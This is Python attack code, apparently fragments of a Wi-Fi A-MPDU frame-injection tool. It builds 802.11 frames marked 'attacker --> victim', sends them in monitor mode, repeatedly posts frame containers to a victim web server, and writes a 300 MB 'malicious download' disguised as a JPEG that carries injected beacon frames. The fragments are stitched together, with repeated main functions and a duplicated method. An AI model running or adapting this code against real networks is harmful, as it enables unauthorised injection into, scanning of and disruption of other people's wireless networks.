def main():
count = 1
ip_count = 1
# send the packet a number of times
for i in range(0, 10):
count = (count + 1) % 1024
ip_count = (ip_count % 255) + 1
# Ping from attacker --> victim
# You need to change the MAC addresses and IPs to match the remote AP
pkt = Dot11Packet('ff:ff:ff:ff:ff:ff', '64:D1:A3:3D:26:5B',
'64:D1:A3:3D:26:5B')
printd(clr(Color.YELLOW, "Radiotap:"), Level.INFO)
#sys.stdout.flush()
hexdump.hexdump(str(pkt.rt))
#for character in str(pkt.rt):
# this prints "\x 00 \x 00 \x 12 \x 00 \x 2e \x 08 \x 00 \x 00 \x 00 \x 6c \x 6c \x 09 \x c0 \x 00 \x c0 \x 01 \x 00 \x 00 "
#print '\\x',character.encode('hex'),
sys.stdout.flush()
printd("", Level.INFO) #print a linefeed
printd(clr(Color.YELLOW, "802.11 hdr:"), Level.INFO)
#sys.stdout.flush()
hexdump.hexdump(str(pkt.dot11hdr))
sys.stdout.flush()
# add an MSDU
pkt.add_msdu(
ping_packet(count, "10.0.0.1", "192.168.0." + str(ip_count)))
printd(clr(Color.YELLOW, "MSDU added:"), Level.INFO)
#sys.stdout.flush()
hexdump.hexdump(
str(ping_packet(count, "10.0.0.1", "192.168.0." + str(ip_count))))
sys.stdout.flush()
printd(clr(Color.YELLOW, "Radiotap + 802.11 hdr + MSDU + CRC:"),
Level.INFO)
#sys.stdout.flush()
hexdump.hexdump(str(pkt.data))
sys.stdout.flush()
#for character in str(pkt.data):
# this prints "\x 80 \x 04 \x bb \x 4e \x 88 \x 02 \x 00 \x 00 \x ff \x ff \x ff \x ff \x ff \x ff \x 64 "
#print "\\x",character.encode('hex'), #does not work in python3
#print character, character.encode('hex'),
printd("", Level.INFO) #print a linefeed
# send the packet
pkt.send() #the interface has to be in monitor mode
printd("packet sent", Level.INFO)
time.sleep(0.1)
def main():
session = requests.Session()
count = 1
ip_count = 0
printd(clr(Color.BLUE, "Building container..."), Level.INFO)
""" Build container """
container = ''
for i in range(0, 800):
count = (count + 1) % 1024
ip_count = (ip_count % 255) + 1
# Ping from attacker --> victim
# You need to change the MAC addresses and IPs to match the remote AP
ampdu_pkt = AMPDUPacket('ff:ff:ff:ff:ff:ff', '64:D1:A3:3D:26:5B', '64:D1:A3:3D:26:5B', 0x02)
ampdu_pkt.add_msdu(ping_packet(count, "10.0.0.1", "192.168.0." + str(ip_count)))
ampdu_pkt.add_padding(8)
container += str(ampdu_pkt)
# Beacon from attacker --> victim
#ampdu_pkt = ssid_packet()
#container += str(ampdu_pkt)
# Ping from victim --> access point
#ampdu_pkt = AMPDUPacket('4C:5E:0C:9E:82:19', 'f8:1a:67:1b:14:00', '4C:5E:0C:9E:82:19')
#ampdu_pkt.add_msdu(ping_packet(count, "192.168.88.254", "10.0.0." + str(ip_count)))
#ampdu_pkt.add_padding(8)
#container += str(ampdu_pkt)
""" end package """
printd(clr(Color.BLUE, "Finished building container! Sending..."), Level.INFO)
while 1:
print("."),
sys.stdout.flush()
request_params = {'postpayload': ("\x00" * random.randint(0, 3)) + str(container)}
try:
session.post("http://" + "10.0.0.6:80" + "/index.html", files=request_params, timeout=5)
except requests.exceptions.ConnectionError:
printd(clr(Color.RED, "Could not connect to host"), Level.CRITICAL)
pass
except Exception:
printd(clr(Color.RED, "Another exception"), Level.CRITICAL)
pass
def main_download():
# Malicious download
raw_input("This will create a 300 MB file download.jpg in the working directory. Press any key to continue or CTRL+C to exit.")
printd(clr(Color.YELLOW, "Creating malicious download..."), Level.INFO)
container = ""
for i in range(0, 256):
# Containers are (series of) frames to inject into the remote network
# Container for scanning hosts on internal network
#md_pkt = AMPDUPacket('ff:ff:ff:ff:ff:ff', '4C:5E:0C:9E:82:19', '4C:5E:0C:9E:82:19', 0x02)
#md_pkt.add_msdu(ping_packet(i, "10.0.0.1", "192.168.88.249"))
#md_pkt.add_padding(8)
# Container for a Beacon frame
md_pkt = ssid_packet()
container += str(md_pkt)
md = MaliciousDownload(container)
md.write()
def dump_to_file(self):
with open('ampdu.bin', 'w') as f:
printd(clr(Color.YELLOW, "Dumped garbage packet"), Level.INFO)
f.write(str(self) * 250)
def dump_to_file(self):
with open('ampdu.bin', 'w') as f:
printd(clr(Color.YELLOW, "Dumped garbage packet"), Level.INFO)
f.write(str(self) * 250)
def main_ampdu():
# "Requests" Python library: http://docs.python-requests.org/en/master/user/advanced/
#session = requests.Session()
count = 1
ip_count = 0
printd(clr(Color.BLUE, "Building container..."), Level.INFO)
""" Build container """
container = ''
for i in range(0, 2):
count = (count + 1) % 1024
ip_count = (ip_count % 255) + 1
# Ping from attacker --> victim
# You need to change the MAC addresses and IPs to match the remote AP
ampdu_pkt = AMPDUPacket('ff:ff:ff:ff:ff:ff', '64:D1:A3:3D:26:5B',
'64:D1:A3:3D:26:5B', 0x02)
printd(clr(Color.YELLOW, "Radiotap (rt):"), Level.INFO)
#sys.stdout.flush()
hexdump.hexdump(str(ampdu_pkt.rt))
for character in str(ampdu_pkt.rt):
# this prints "\x 00 \x 00 \x 12 \x 00 \x 2e \x 08 \x 00 \x 00 \x 00 \x 6c \x 6c \x 09 \x c0 \x 00 \x c0 \x 01 \x 00 \x 00 "
print "\\x", character.encode('hex'), #does not work in python3
sys.stdout.flush()
printd("", Level.INFO) #print a linefeed
printd(clr(Color.YELLOW, "dot11hdr:"), Level.INFO)
#sys.stdout.flush()
hexdump.hexdump(str(ampdu_pkt.dot11hdr))
sys.stdout.flush()
# add an MSDU to the AMPDU
ampdu_pkt.add_msdu(
ping_packet(count, "10.0.0.1", "192.168.0." + str(ip_count)))
printd(clr(Color.YELLOW, "AMPDU with the MSDU added:"), Level.INFO)
#sys.stdout.flush()
hexdump.hexdump(str(ampdu_pkt))
sys.stdout.flush()
ampdu_pkt.add_padding(8)
printd(
clr(Color.YELLOW,
"AMPDU with MSDU and 8 padding delimiters added:"), Level.INFO)
#sys.stdout.flush()
hexdump.hexdump(str(ampdu_pkt))
sys.stdout.flush()
container += str(ampdu_pkt)
# Beacon from attacker --> victim
#ampdu_pkt = ssid_packet()
#container += str(ampdu_pkt)
# Ping from victim --> access point
#ampdu_pkt = AMPDUPacket('4C:5E:0C:9E:82:19', 'f8:1a:67:1b:14:00', '4C:5E:0C:9E:82:19')
#ampdu_pkt.add_msdu(ping_packet(count, "192.168.88.254", "10.0.0." + str(ip_count)))
#ampdu_pkt.add_padding(8)
#container += str(ampdu_pkt)
""" end package """
printd(clr(Color.BLUE, "Final A-MPDU built:"), Level.INFO)
sys.stdout.flush()
#hexdump.hexdump('\x00'*16)
#hexdump.hexdump("Hello world")
hexdump.hexdump(container)
sys.stdout.flush()
for character in container:
# this prints "\x 80 \x 04 \x bb \x 4e \x 88 \x 02 \x 00 \x 00 \x ff \x ff \x ff \x ff \x ff \x ff \x 64 "
print "\\x", character.encode('hex'), #does not work in python3
#print character, character.encode('hex'),
printd("", Level.INFO) #print a linefeed
# send the packet a number of times
for i in range(0, 10):
# send the packet
ampdu_pkt.send() #the interface has to be in monitor mode
printd("packet sent", Level.INFO)
time.sleep(0.1)
"""
